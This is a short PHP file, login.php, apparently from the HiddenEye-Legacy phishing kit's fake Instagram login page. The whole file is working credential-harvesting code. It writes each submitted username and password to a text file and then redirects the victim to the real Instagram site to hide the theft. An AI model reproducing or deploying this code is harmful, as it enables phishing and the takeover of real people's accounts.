HiddenEye-Legacy/WebPages/Instagram_web/login.php

7 lines
203 B
PHP

<?php
include 'base.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://instagram.com');
exit();